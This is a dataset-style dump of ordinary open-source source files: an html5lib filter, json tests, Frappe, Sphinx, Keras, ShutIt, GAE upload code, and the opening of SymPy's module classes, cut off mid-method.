repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
odejesush/tensorflow | venv/lib/python2.7/site-packages/pip/_vendor/html5lib/filters/whitespace.py | 353 | 1139 | from __future__ import absolute_import, division, unicode_literals
import re
from . import base
from ..constants import rcdataElements, spaceCharacters
# Flatten the set of HTML space characters into a single string, then build
# a regex matching one-or-more of any of them.
spaceCharacters = "".join(spaceCharacters)
SPACES_REGEX = re.compile("[%s]+" % spaceCharacters)
class Filter(base.Filter):
    """Collapses runs of whitespace, except inside ``pre``, ``textarea``
    and RCDATA elements, where whitespace is significant."""

    spacePreserveElements = frozenset(["pre", "textarea"] + list(rcdataElements))

    def __iter__(self):
        # Nesting depth of space-preserving elements; > 0 means "hands off".
        depth = 0
        for token in base.Filter.__iter__(self):
            token_type = token["type"]
            if token_type == "StartTag" and (
                    depth or token["name"] in self.spacePreserveElements):
                depth += 1
            elif token_type == "EndTag" and depth:
                depth -= 1
            elif not depth and token_type == "SpaceCharacters" and token["data"]:
                # Only rewrite non-empty data so we never introduce a space
                # where there was none.
                token["data"] = " "
            elif not depth and token_type == "Characters":
                token["data"] = collapse_spaces(token["data"])
            yield token
def collapse_spaces(text):
    """Replace every run of HTML space characters in *text* with one space."""
    return SPACES_REGEX.sub(' ', text)
| apache-2.0 |
albertjan/pypyjs | website/js/pypy.js-0.2.0/lib/modules/json/tests/test_unicode.py | 11 | 3779 | from collections import OrderedDict
from json.tests import PyTest, CTest
class TestUnicode(object):
    """Unicode round-trip tests for the json module (Python 2).

    Mixed into concrete test classes below via PyTest/CTest, which supply
    ``self.json``, ``self.dumps`` and ``self.loads`` bound to either the
    pure-Python or the C-accelerated implementation.
    """

    def test_encoding1(self):
        # Encoding a unicode string and its utf-8 byte string must agree.
        encoder = self.json.JSONEncoder(encoding='utf-8')
        u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
        s = u.encode('utf-8')
        ju = encoder.encode(u)
        js = encoder.encode(s)
        self.assertEqual(ju, js)

    def test_encoding2(self):
        # Same as test_encoding1, but through the module-level dumps().
        u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
        s = u.encode('utf-8')
        ju = self.dumps(u, encoding='utf-8')
        js = self.dumps(s, encoding='utf-8')
        self.assertEqual(ju, js)

    def test_encoding3(self):
        # Non-ASCII characters are \u-escaped by default.
        u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
        j = self.dumps(u)
        self.assertEqual(j, '"\\u03b1\\u03a9"')

    def test_encoding4(self):
        u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
        j = self.dumps([u])
        self.assertEqual(j, '["\\u03b1\\u03a9"]')

    def test_encoding5(self):
        # ensure_ascii=False passes non-ASCII characters through verbatim.
        u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
        j = self.dumps(u, ensure_ascii=False)
        self.assertEqual(j, u'"{0}"'.format(u))

    def test_encoding6(self):
        u = u'\N{GREEK SMALL LETTER ALPHA}\N{GREEK CAPITAL LETTER OMEGA}'
        j = self.dumps([u], ensure_ascii=False)
        self.assertEqual(j, u'["{0}"]'.format(u))

    def test_big_unicode_encode(self):
        # Astral-plane characters encode as a UTF-16 surrogate pair.
        u = u'\U0001d120'
        self.assertEqual(self.dumps(u), '"\\ud834\\udd20"')
        self.assertEqual(self.dumps(u, ensure_ascii=False), u'"\U0001d120"')

    def test_big_unicode_decode(self):
        u = u'z\U0001d120x'
        self.assertEqual(self.loads('"' + u + '"'), u)
        self.assertEqual(self.loads('"z\\ud834\\udd20x"'), u)

    def test_unicode_decode(self):
        # Every BMP code point below the surrogate range round-trips.
        for i in range(0, 0xd7ff):
            u = unichr(i)
            s = '"\\u{0:04x}"'.format(i)
            self.assertEqual(self.loads(s), u)

    def test_object_pairs_hook_with_unicode(self):
        s = u'{"xkd":1, "kcw":2, "art":3, "hxm":4, "qrt":5, "pad":6, "hoy":7}'
        p = [(u"xkd", 1), (u"kcw", 2), (u"art", 3), (u"hxm", 4),
             (u"qrt", 5), (u"pad", 6), (u"hoy", 7)]
        self.assertEqual(self.loads(s), eval(s))
        self.assertEqual(self.loads(s, object_pairs_hook = lambda x: x), p)
        od = self.loads(s, object_pairs_hook = OrderedDict)
        self.assertEqual(od, OrderedDict(p))
        self.assertEqual(type(od), OrderedDict)
        # the object_pairs_hook takes priority over the object_hook
        self.assertEqual(self.loads(s,
                                    object_pairs_hook = OrderedDict,
                                    object_hook = lambda x: None),
                         OrderedDict(p))

    def test_default_encoding(self):
        # Byte strings default to being decoded as utf-8.
        self.assertEqual(self.loads(u'{"a": "\xe9"}'.encode('utf-8')),
                         {'a': u'\xe9'})

    def test_unicode_preservation(self):
        # Decoded strings are always unicode, even for pure-ASCII input.
        self.assertEqual(type(self.loads(u'""')), unicode)
        self.assertEqual(type(self.loads(u'"a"')), unicode)
        self.assertEqual(type(self.loads(u'["a"]')[0]), unicode)
        # Issue 10038.
        self.assertEqual(type(self.loads('"foo"')), unicode)

    def test_encode_not_utf_8(self):
        # A non-utf-8 byte-string input honours the explicit encoding arg.
        self.assertEqual(self.dumps('\xb1\xe6', encoding='iso8859-2'),
                         '"\\u0105\\u0107"')
        self.assertEqual(self.dumps(['\xb1\xe6'], encoding='iso8859-2'),
                         '["\\u0105\\u0107"]')

    def test_bad_encoding(self):
        # Bad values for the encoding argument raise, not silently decode.
        self.assertRaises(UnicodeEncodeError, self.loads, '"a"', u"rat\xe9")
        self.assertRaises(TypeError, self.loads, '"a"', 1)
# Concrete test classes: run the suite against the pure-Python and the
# C-accelerated json implementations respectively.
class TestPyUnicode(TestUnicode, PyTest): pass
class TestCUnicode(TestUnicode, CTest): pass
| mit |
rohitwaghchaure/vestasi-frappe | frappe/website/doctype/user_vote/user_vote.py | 28 | 1673 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.website.permissions import get_access
from frappe.website.doctype.website_group.website_group import clear_cache
from frappe.model.document import Document
class UserVote(Document):
    """A single user's vote on a referenced document.

    Enforces one vote per user per document and keeps the referenced
    document's ``upvotes`` field in sync on insert/update/delete.
    """

    def after_insert(self):
        # Invalidate the cached website page of the voted-on item.
        clear_cache(self.ref_name)

    def validate(self):
        # if new
        if self.get("__islocal"):
            # Reject a second vote by the same user on the same document.
            if frappe.db.get_value("User Vote", {"ref_doctype": self.ref_doctype,
                "ref_name": self.ref_name, "owner": frappe.session.user}):
                raise frappe.DuplicateEntryError

    def on_update(self):
        self.update_ref_count()

    def on_trash(self):
        # The row being deleted is still included in the recount below,
        # so offset the stored total by -1.
        self.update_ref_count(-1)

    def update_ref_count(self, cnt=0):
        """Recount votes for the referenced document and write the total
        (plus offset ``cnt``) into its ``upvotes`` field."""
        count = frappe.db.sql("""select count(*) from `tabUser Vote` where ref_doctype=%s and ref_name=%s""",
            (self.ref_doctype, self.ref_name))[0][0]
        frappe.db.set_value(self.ref_doctype, self.ref_name, "upvotes", count + cnt)
def on_doctype_update():
    # Composite index speeds up the per-document vote lookups above.
    frappe.db.add_index("User Vote", ["ref_doctype", "ref_name"])
# don't allow guest to give vote
@frappe.whitelist()
def set_vote(ref_doctype, ref_name):
    """Record the current session user's vote on (ref_doctype, ref_name).

    Returns "ok" on success, "duplicate" if this user already voted.
    Raises frappe.PermissionError if the user cannot read the document's
    website group.
    """
    website_group_name = frappe.db.get_value(ref_doctype, ref_name, "website_group")
    group = frappe.get_doc("Website Group", website_group_name)
    if not get_access(group, group.get_route()).get("read"):
        raise frappe.PermissionError
    try:
        user_vote = frappe.get_doc({
            "doctype": "User Vote",
            "ref_doctype": ref_doctype,
            "ref_name": ref_name
        })
        # Permission check already done against the website group above.
        user_vote.ignore_permissions = True
        user_vote.insert()
        return "ok"
    except frappe.DuplicateEntryError:
        return "duplicate"
| mit |
vrkansagara/guzzle | docs/conf.py | 51 | 2008 | import sys, os
# Sphinx build configuration for the Guzzle documentation.
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer

# Highlight bare ``php`` code blocks (no <?php tag needed), with line numbers.
lexers['php'] = PhpLexer(startinline=True, linenos=1)
lexers['php-annotations'] = PhpLexer(startinline=True, linenos=1)
primary_domain = 'php'

extensions = []
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'Guzzle'
copyright = u'2015, Michael Dowling'
version = '6'
html_title = "Guzzle Documentation"
html_short_title = "Guzzle 6"
exclude_patterns = ['_build']
html_static_path = ['_static']

##### Guzzle sphinx theme

import guzzle_sphinx_theme
html_translator_class = 'guzzle_sphinx_theme.HTMLTranslator'
html_theme_path = guzzle_sphinx_theme.html_theme_path()
html_theme = 'guzzle_sphinx_theme'

# Custom sidebar templates, maps document names to template names.
html_sidebars = {
    '**': ['logo-text.html', 'globaltoc.html', 'searchbox.html']
}

# Register the theme as an extension to generate a sitemap.xml
extensions.append("guzzle_sphinx_theme")

# Guzzle theme options (see theme.conf for more information)
html_theme_options = {

    # Set the path to a special layout to include for the homepage
    # "index_template": "homepage.html",

    # Allow a separate homepage from the master_doc
    # homepage = index

    # Set the name of the project to appear in the nav menu
    # "project_nav_name": "Guzzle",

    # Set your Disqus short name to enable comments
    # "disqus_comments_shortname": "my_disqus_comments_short_name",

    # Set you GA account ID to enable tracking
    # "google_analytics_account": "my_ga_account",

    # Path to a touch icon
    # "touch_icon": "",

    # Specify a base_url used to generate sitemap.xml links. If not
    # specified, then no sitemap will be built.
    "base_url": "http://guzzlephp.org"

    # Allow the "Table of Contents" page to be defined separately from "master_doc"
    # tocpage = Contents

    # Allow the project link to be overriden to a custom URL.
    # projectlink = http://myproject.url
}
| mit |
petewarden/tensorflow | tensorflow/python/keras/layers/preprocessing/category_encoding.py | 2 | 8532 | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras CategoryEncoding preprocessing layer."""
# pylint: disable=g-classes-have-attributes
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.engine import base_preprocessing_layer
from tensorflow.python.keras.utils import layer_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import bincount_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util.tf_export import keras_export
# Recognised output_mode values for CategoryEncoding.
INT = "int"
BINARY = "binary"
COUNT = "count"
@keras_export("keras.layers.experimental.preprocessing.CategoryEncoding")
class CategoryEncoding(base_preprocessing_layer.PreprocessingLayer):
  """Category encoding layer.

  This layer provides options for condensing data into a categorical encoding
  when the total number of tokens are known in advance. It accepts integer
  values as inputs and outputs a dense representation (one sample = 1-index
  tensor of float values representing data about the sample's tokens) of those
  inputs. For integer inputs where the total number of tokens is not known, see
  `tf.keras.layers.experimental.preprocessing.IntegerLookup`.

  Examples:

  **Multi-hot encoding data**

  >>> layer = tf.keras.layers.experimental.preprocessing.CategoryEncoding(
  ...           num_tokens=4, output_mode="binary")
  >>> layer([[0, 1], [0, 0], [1, 2], [3, 1]])
  <tf.Tensor: shape=(4, 4), dtype=float32, numpy=
    array([[1., 1., 0., 0.],
           [1., 0., 0., 0.],
           [0., 1., 1., 0.],
           [0., 1., 0., 1.]], dtype=float32)>

  **Using weighted inputs in `count` mode**

  >>> layer = tf.keras.layers.experimental.preprocessing.CategoryEncoding(
  ...           num_tokens=4, output_mode="count")
  >>> count_weights = np.array([[.1, .2], [.1, .1], [.2, .3], [.4, .2]])
  >>> layer([[0, 1], [0, 0], [1, 2], [3, 1]], count_weights=count_weights)
  <tf.Tensor: shape=(4, 4), dtype=float64, numpy=
    array([[0.1, 0.2, 0. , 0. ],
           [0.2, 0. , 0. , 0. ],
           [0. , 0.2, 0.3, 0. ],
           [0. , 0.2, 0. , 0.4]])>

  Args:
    num_tokens: The total number of tokens the layer should support. All inputs
      to the layer must integers in the range 0 <= value < num_tokens or an
      error will be thrown.
    output_mode: Specification for the output of the layer.
      Defaults to "binary". Values can
      be "binary" or "count", configuring the layer as follows:
        "binary": Outputs a single int array per batch, of num_tokens size,
          containing 1s in all elements where the token mapped to that index
          exists at least once in the batch item.
        "count": As "binary", but the int array contains a count of the number
          of times the token at that index appeared in the batch item.
    sparse: Boolean. If true, returns a `SparseTensor` instead of a dense
      `Tensor`. Defaults to `False`.

  Call arguments:
    inputs: A 2D tensor `(samples, timesteps)`.
    count_weights: A 2D tensor in the same shape as `inputs` indicating the
      weight for each sample value when summing up in `count` mode. Not used in
      `binary` mode.
  """

  def __init__(self,
               num_tokens=None,
               output_mode=BINARY,
               sparse=False,
               **kwargs):
    # max_tokens is an old name for the num_tokens arg we continue to support
    # because of usage.
    if "max_tokens" in kwargs:
      logging.warning(
          "max_tokens is deprecated, please use num_tokens instead.")
      num_tokens = kwargs["max_tokens"]
      del kwargs["max_tokens"]

    super(CategoryEncoding, self).__init__(**kwargs)

    # 'output_mode' must be one of (COUNT, BINARY)
    layer_utils.validate_string_arg(
        output_mode,
        allowable_strings=(COUNT, BINARY),
        layer_name="CategoryEncoding",
        arg_name="output_mode")

    if num_tokens is None:
      raise ValueError("num_tokens must be set to use this layer. If the "
                       "number of tokens is not known beforehand, use the "
                       "IntegerLookup layer instead.")
    if num_tokens < 1:
      raise ValueError("num_tokens must be >= 1.")

    self.num_tokens = num_tokens
    self.output_mode = output_mode
    self.sparse = sparse

  def compute_output_shape(self, input_shape):
    # Output is always (batch, num_tokens) regardless of input timesteps.
    return tensor_shape.TensorShape([input_shape[0], self.num_tokens])

  def compute_output_signature(self, input_spec):
    output_shape = self.compute_output_shape(input_spec.shape.as_list())
    if self.sparse:
      return sparse_tensor.SparseTensorSpec(
          shape=output_shape, dtype=dtypes.int64)
    else:
      return tensor_spec.TensorSpec(shape=output_shape, dtype=dtypes.int64)

  def get_config(self):
    # Serialize constructor args so the layer can be re-created from config.
    config = {
        "num_tokens": self.num_tokens,
        "output_mode": self.output_mode,
        "sparse": self.sparse,
    }
    base_config = super(CategoryEncoding, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))

  def call(self, inputs, count_weights=None):
    if isinstance(inputs, (list, np.ndarray)):
      inputs = ops.convert_to_tensor_v2_with_dispatch(inputs)
    if inputs.shape.rank == 1:
      # Promote a rank-1 input to a single-timestep batch.
      inputs = array_ops.expand_dims(inputs, 1)

    if count_weights is not None and self.output_mode != COUNT:
      raise ValueError("count_weights is not used in `output_mode='binary'`. "
                       "Please pass a single input.")

    out_depth = self.num_tokens
    binary_output = (self.output_mode == BINARY)
    if isinstance(inputs, sparse_tensor.SparseTensor):
      max_value = math_ops.reduce_max(inputs.values)
      min_value = math_ops.reduce_min(inputs.values)
    else:
      max_value = math_ops.reduce_max(inputs)
      min_value = math_ops.reduce_min(inputs)
    condition = math_ops.logical_and(
        math_ops.greater(
            math_ops.cast(out_depth, max_value.dtype), max_value),
        math_ops.greater_equal(
            min_value, math_ops.cast(0, min_value.dtype)))
    # NOTE(review): the Assert op's return value is not wired into the
    # graph here, so in graph mode this check may not actually execute —
    # confirm intended behavior.
    control_flow_ops.Assert(condition, [
        "Input values must be in the range 0 <= values < num_tokens"
        " with num_tokens={}".format(out_depth)
    ])
    if self.sparse:
      return sparse_bincount(inputs, out_depth, binary_output, count_weights)
    else:
      return dense_bincount(inputs, out_depth, binary_output, count_weights)
def sparse_bincount(inputs, out_depth, binary_output, count_weights=None):
  """Apply binary or count encoding to an input and return a sparse tensor."""
  counts = bincount_ops.sparse_bincount(
      inputs,
      weights=count_weights,
      minlength=out_depth,
      maxlength=out_depth,
      axis=-1,
      binary_output=binary_output)
  counts = math_ops.cast(counts, K.floatx())
  # Rebuild the SparseTensor with a dense_shape pinned to the runtime
  # batch size and the requested output depth.
  num_samples = array_ops.shape(counts)[0]
  return sparse_tensor.SparseTensor(
      indices=counts.indices,
      values=counts.values,
      dense_shape=[num_samples, out_depth])
def dense_bincount(inputs, out_depth, binary_output, count_weights=None):
  """Apply binary or count encoding to an input."""
  counts = bincount_ops.bincount(
      inputs,
      weights=count_weights,
      minlength=out_depth,
      maxlength=out_depth,
      dtype=K.floatx(),
      axis=-1,
      binary_output=binary_output)
  # Propagate the (possibly static) batch dimension to the output shape.
  num_samples = inputs.shape.as_list()[0]
  counts.set_shape(tensor_shape.TensorShape((num_samples, out_depth)))
  return counts
| apache-2.0 |
ianmiell/shutit-distro | xorg_apps/xorg_apps.py | 1 | 1658 | """ShutIt module. See http://shutit.tk
"""
from shutit_module import ShutItModule
class xorg_apps(ShutItModule):
    """ShutIt build module for the X.Org application collection (app-7.7)."""

    def build(self, shutit):
        import sd_util
        # Ensure the X build environment variables (e.g. XORG_CONFIG) are set.
        sd_util.setup_x_environment(shutit)
        shutit.send('mkdir -p /tmp/build/xorg_apps')
        shutit.send('cd /tmp/build/xorg_apps')
        shutit.send_host_file('/tmp/build/xorg_apps/app-7.7.md5','context/app-7.7.md5')
        # Download every tarball listed in the md5 manifest, then verify them.
        shutit.send('''grep -v '^#' app-7.7.md5 | awk '{print $2}' | wget -i- -c -B http://xorg.freedesktop.org/releases/individual/app/''')
        shutit.send('md5sum -c app-7.7.md5')
        shutit.login(command='bash -e')
        # For each package: unpack, apply the luit _XOPEN_SOURCE workaround
        # where needed, then configure/make/install and clean up.
        shutit.run_script(r'''for package in $(grep -v '^#' ../app-7.7.md5 | awk '{print $2}')
do
packagedir=${package%.tar.bz2}
tar -xf $package
pushd $packagedir
case $packagedir in
luit-[0-9]* )
line1="#ifdef _XOPEN_SOURCE"
line2="# undef _XOPEN_SOURCE"
line3="# define _XOPEN_SOURCE 600"
line4="#endif"
sed -i -e "s@#ifdef HAVE_CONFIG_H@$line1\n$line2\n$line3\n$line4\n\n&@" sys.c
unset line1 line2 line3 line4
;;
esac
./configure $XORG_CONFIG
make
make install
popd
rm -rf $packagedir
done
''')
        shutit.pause_point('mkfontscale')
        shutit.logout()
        return True

    def finalize(self, shutit):
        # Remove the temporary build tree.
        shutit.send('rm -rf /tmp/build/xorg_apps')
        return True
def module():
    """ShutIt module factory: return a configured xorg_apps instance."""
    return xorg_apps(
        'shutit.tk.sd.xorg_apps.xorg_apps', 158844782.026,
        description='',
        maintainer='',
        depends=['shutit.tk.sd.libpng.libpng','shutit.tk.sd.mesalib.mesalib','shutit.tk.sd.xbitmaps.xbitmaps','shutit.tk.sd.xcb_util.xcb_util','shutit.tk.sd.linux_pam.linux_pam']
    )
| gpl-2.0 |
anniyananeesh/avenirevents | classes/Uploader/server/gae-python/main.py | 245 | 5845 | # -*- coding: utf-8 -*-
#
# jQuery File Upload Plugin GAE Python Example 2.2.0
# https://github.com/blueimp/jQuery-File-Upload
#
# Copyright 2011, Sebastian Tschan
# https://blueimp.net
#
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT
#
from __future__ import with_statement
from google.appengine.api import files, images
from google.appengine.ext import blobstore, deferred
from google.appengine.ext.webapp import blobstore_handlers
import json
import re
import urllib
import webapp2
# Upload constraints and demo settings for the jQuery File Upload handler.
WEBSITE = 'https://blueimp.github.io/jQuery-File-Upload/'
MIN_FILE_SIZE = 1  # bytes
MAX_FILE_SIZE = 5000000  # bytes
IMAGE_TYPES = re.compile('image/(gif|p?jpeg|(x-)?png)')
ACCEPT_FILE_TYPES = IMAGE_TYPES
THUMBNAIL_MODIFICATOR = '=s80'  # max width / height
EXPIRATION_TIME = 300  # seconds
def cleanup(blob_keys):
    # Deferred task: delete demo uploads once EXPIRATION_TIME has passed.
    blobstore.delete(blob_keys)
class UploadHandler(webapp2.RequestHandler):
    """CORS-enabled handler that stores uploaded files in the GAE blobstore
    and returns jQuery-File-Upload-compatible JSON results."""

    def initialize(self, request, response):
        super(UploadHandler, self).initialize(request, response)
        # Permissive CORS headers so the upload widget works cross-origin.
        self.response.headers['Access-Control-Allow-Origin'] = '*'
        self.response.headers[
            'Access-Control-Allow-Methods'
        ] = 'OPTIONS, HEAD, GET, POST, PUT, DELETE'
        self.response.headers[
            'Access-Control-Allow-Headers'
        ] = 'Content-Type, Content-Range, Content-Disposition'

    def validate(self, file):
        # On rejection, records the reason in file['error'] and returns False.
        if file['size'] < MIN_FILE_SIZE:
            file['error'] = 'File is too small'
        elif file['size'] > MAX_FILE_SIZE:
            file['error'] = 'File is too big'
        elif not ACCEPT_FILE_TYPES.match(file['type']):
            file['error'] = 'Filetype not allowed'
        else:
            return True
        return False

    def get_file_size(self, file):
        file.seek(0, 2)  # Seek to the end of the file
        size = file.tell()  # Get the position of EOF
        file.seek(0)  # Reset the file position to the beginning
        return size

    def write_blob(self, data, info):
        # Store the raw bytes in the blobstore; returns the new blob key.
        blob = files.blobstore.create(
            mime_type=info['type'],
            _blobinfo_uploaded_filename=info['name']
        )
        with files.open(blob, 'a') as f:
            f.write(data)
        files.finalize(blob)
        return files.blobstore.get_blob_key(blob)

    def handle_upload(self):
        """Validate and store each posted file; return their result dicts."""
        results = []
        blob_keys = []
        for name, fieldStorage in self.request.POST.items():
            # Skip plain form fields; only file parts have a FieldStorage.
            if type(fieldStorage) is unicode:
                continue
            result = {}
            # Strip any Windows-style path prefix from the client filename.
            result['name'] = re.sub(
                r'^.*\\',
                '',
                fieldStorage.filename
            )
            result['type'] = fieldStorage.type
            result['size'] = self.get_file_size(fieldStorage.file)
            if self.validate(result):
                blob_key = str(
                    self.write_blob(fieldStorage.value, result)
                )
                blob_keys.append(blob_key)
                result['deleteType'] = 'DELETE'
                result['deleteUrl'] = self.request.host_url +\
                    '/?key=' + urllib.quote(blob_key, '')
                if (IMAGE_TYPES.match(result['type'])):
                    try:
                        result['url'] = images.get_serving_url(
                            blob_key,
                            secure_url=self.request.host_url.startswith(
                                'https'
                            )
                        )
                        result['thumbnailUrl'] = result['url'] +\
                            THUMBNAIL_MODIFICATOR
                    except:  # Could not get an image serving url
                        pass
                if not 'url' in result:
                    result['url'] = self.request.host_url +\
                        '/' + blob_key + '/' + urllib.quote(
                            result['name'].encode('utf-8'), '')
            results.append(result)
        # Demo mode: schedule deletion of the uploads after EXPIRATION_TIME.
        deferred.defer(
            cleanup,
            blob_keys,
            _countdown=EXPIRATION_TIME
        )
        return results

    def options(self):
        # CORS preflight; the headers were already set in initialize().
        pass

    def head(self):
        pass

    def get(self):
        self.redirect(WEBSITE)

    def post(self):
        # Method override for clients that cannot send a real DELETE.
        if (self.request.get('_method') == 'DELETE'):
            return self.delete()
        result = {'files': self.handle_upload()}
        s = json.dumps(result, separators=(',', ':'))
        redirect = self.request.get('redirect')
        if redirect:
            # Legacy iframe transport: embed the JSON into a redirect URL.
            return self.redirect(str(
                redirect.replace('%s', urllib.quote(s, ''), 1)
            ))
        if 'application/json' in self.request.headers.get('Accept'):
            self.response.headers['Content-Type'] = 'application/json'
        self.response.write(s)

    def delete(self):
        key = self.request.get('key') or ''
        blobstore.delete(key)
        s = json.dumps({key: True}, separators=(',', ':'))
        if 'application/json' in self.request.headers.get('Accept'):
            self.response.headers['Content-Type'] = 'application/json'
        self.response.write(s)
class DownloadHandler(blobstore_handlers.BlobstoreDownloadHandler):
    """Serves a stored blob back to the client as a forced download."""

    def get(self, key, filename):
        if not blobstore.get(key):
            self.error(404)
        else:
            # Prevent browsers from MIME-sniffing the content-type:
            self.response.headers['X-Content-Type-Options'] = 'nosniff'
            # Cache for the expiration time:
            self.response.headers['Cache-Control'] = 'public,max-age=%d' % EXPIRATION_TIME
            # Send the file forcing a download dialog:
            self.send_blob(key, save_as=filename, content_type='application/octet-stream')
# WSGI routing: "/" handles uploads, "/<key>/<filename>" serves downloads.
app = webapp2.WSGIApplication(
    [
        ('/', UploadHandler),
        ('/([^/]+)/([^/]+)', DownloadHandler)
    ],
    debug=True
)
| mit |
oliverlee/sympy | sympy/polys/agca/modules.py | 68 | 45727 | """
Computations with modules over polynomial rings.
This module implements various classes that encapsulate groebner basis
computations for modules. Most of them should not be instantiated by hand.
Instead, use the constructing routines on objects you already have.
For example, to construct a free module over ``QQ[x, y]``, call
``QQ[x, y].free_module(rank)`` instead of the ``FreeModule`` constructor.
In fact ``FreeModule`` is an abstract base class that should not be
instantiated, the ``free_module`` method instead returns the implementing class
``FreeModulePolyRing``.
In general, the abstract base classes implement most functionality in terms of
a few non-implemented methods. The concrete base classes supply only these
non-implemented methods. They may also supply new implementations of the
convenience methods, for example if there are faster algorithms available.
"""
from __future__ import print_function, division
from copy import copy
from sympy.polys.polyerrors import CoercionFailed
from sympy.polys.orderings import ProductOrder, monomial_key
from sympy.polys.domains.field import Field
from sympy.polys.agca.ideals import Ideal
from sympy.core.compatibility import iterable, reduce, range
# TODO
# - module saturation
# - module quotient/intersection for quotient rings
# - free resoltutions / syzygies
# - finding small/minimal generating sets
# - ...
##########################################################################
## Abstract base classes #################################################
##########################################################################
class Module(object):
    """
    Abstract base class for modules.

    Do not instantiate - use ring explicit constructors instead:

    >>> from sympy import QQ
    >>> from sympy.abc import x
    >>> QQ.old_poly_ring(x).free_module(2)
    QQ[x]**2

    Attributes:

    - dtype - type of elements
    - ring - containing ring

    Non-implemented methods:

    - submodule
    - quotient_module
    - is_zero
    - is_submodule
    - multiply_ideal

    The method convert likely needs to be changed in subclasses.
    """

    def __init__(self, ring):
        self.ring = ring

    def convert(self, elem, M=None):
        """
        Convert ``elem`` into internal representation of this module.

        If ``M`` is not None, it should be a module containing it.
        """
        if not isinstance(elem, self.dtype):
            raise CoercionFailed
        return elem

    def submodule(self, *gens):
        """Generate a submodule."""
        raise NotImplementedError

    def quotient_module(self, other):
        """Generate a quotient module."""
        raise NotImplementedError

    def __div__(self, e):
        # M / e builds a quotient module; a non-Module divisor is first
        # interpreted as a list of generators for a submodule of self.
        if not isinstance(e, Module):
            e = self.submodule(*e)
        return self.quotient_module(e)

    __truediv__ = __div__

    def contains(self, elem):
        """Return True if ``elem`` is an element of this module."""
        try:
            self.convert(elem)
            return True
        except CoercionFailed:
            return False

    def __contains__(self, elem):
        return self.contains(elem)

    def subset(self, other):
        """
        Returns True if ``other`` is a subset of ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> F.subset([(1, x), (x, 2)])
        True
        >>> F.subset([(1/x, x), (x, 2)])
        False
        """
        return all(self.contains(x) for x in other)

    def __eq__(self, other):
        # Equality is mutual submodule containment.
        return self.is_submodule(other) and other.is_submodule(self)

    def __ne__(self, other):
        return not (self == other)

    def is_zero(self):
        """Returns True if ``self`` is a zero module."""
        raise NotImplementedError

    def is_submodule(self, other):
        """Returns True if ``other`` is a submodule of ``self``."""
        raise NotImplementedError

    def multiply_ideal(self, other):
        """
        Multiply ``self`` by the ideal ``other``.
        """
        raise NotImplementedError

    def __mul__(self, e):
        # Coerce a non-Ideal multiplier into an ideal of the ground ring.
        if not isinstance(e, Ideal):
            try:
                e = self.ring.ideal(e)
            except (CoercionFailed, NotImplementedError):
                return NotImplemented
        return self.multiply_ideal(e)

    __rmul__ = __mul__

    def identity_hom(self):
        """Return the identity homomorphism on ``self``."""
        raise NotImplementedError
class ModuleElement(object):
    """
    Base class for module element wrappers.

    Use this class to wrap primitive data types as module elements. It stores
    a reference to the containing module, and implements all the arithmetic
    operators.

    Attributes:

    - module - containing module
    - data - internal data

    Methods that likely need change in subclasses:

    - add
    - mul
    - div
    - eq
    """

    def __init__(self, module, data):
        self.module = module
        self.data = data

    def add(self, d1, d2):
        """Add data ``d1`` and ``d2``."""
        return d1 + d2

    def mul(self, m, d):
        """Multiply module data ``m`` by coefficient d."""
        return m * d

    def div(self, m, d):
        """Divide module data ``m`` by coefficient d."""
        return m / d

    def eq(self, d1, d2):
        """Return true if d1 and d2 represent the same element."""
        return d1 == d2

    def __add__(self, om):
        # Coerce the other operand into this module before adding.
        if not isinstance(om, self.__class__) or om.module != self.module:
            try:
                om = self.module.convert(om)
            except CoercionFailed:
                return NotImplemented
        return self.__class__(self.module, self.add(self.data, om.data))

    __radd__ = __add__

    def __neg__(self):
        # Negation is multiplication by -1 of the ground ring.
        return self.__class__(self.module, self.mul(self.data,
                       self.module.ring.convert(-1)))

    def __sub__(self, om):
        if not isinstance(om, self.__class__) or om.module != self.module:
            try:
                om = self.module.convert(om)
            except CoercionFailed:
                return NotImplemented
        return self.__add__(-om)

    def __rsub__(self, om):
        return (-self).__add__(om)

    def __mul__(self, o):
        # Scalar multiplication: coerce ``o`` into the ground ring.
        if not isinstance(o, self.module.ring.dtype):
            try:
                o = self.module.ring.convert(o)
            except CoercionFailed:
                return NotImplemented
        return self.__class__(self.module, self.mul(self.data, o))

    __rmul__ = __mul__

    def __div__(self, o):
        if not isinstance(o, self.module.ring.dtype):
            try:
                o = self.module.ring.convert(o)
            except CoercionFailed:
                return NotImplemented
        return self.__class__(self.module, self.div(self.data, o))

    __truediv__ = __div__

    def __eq__(self, om):
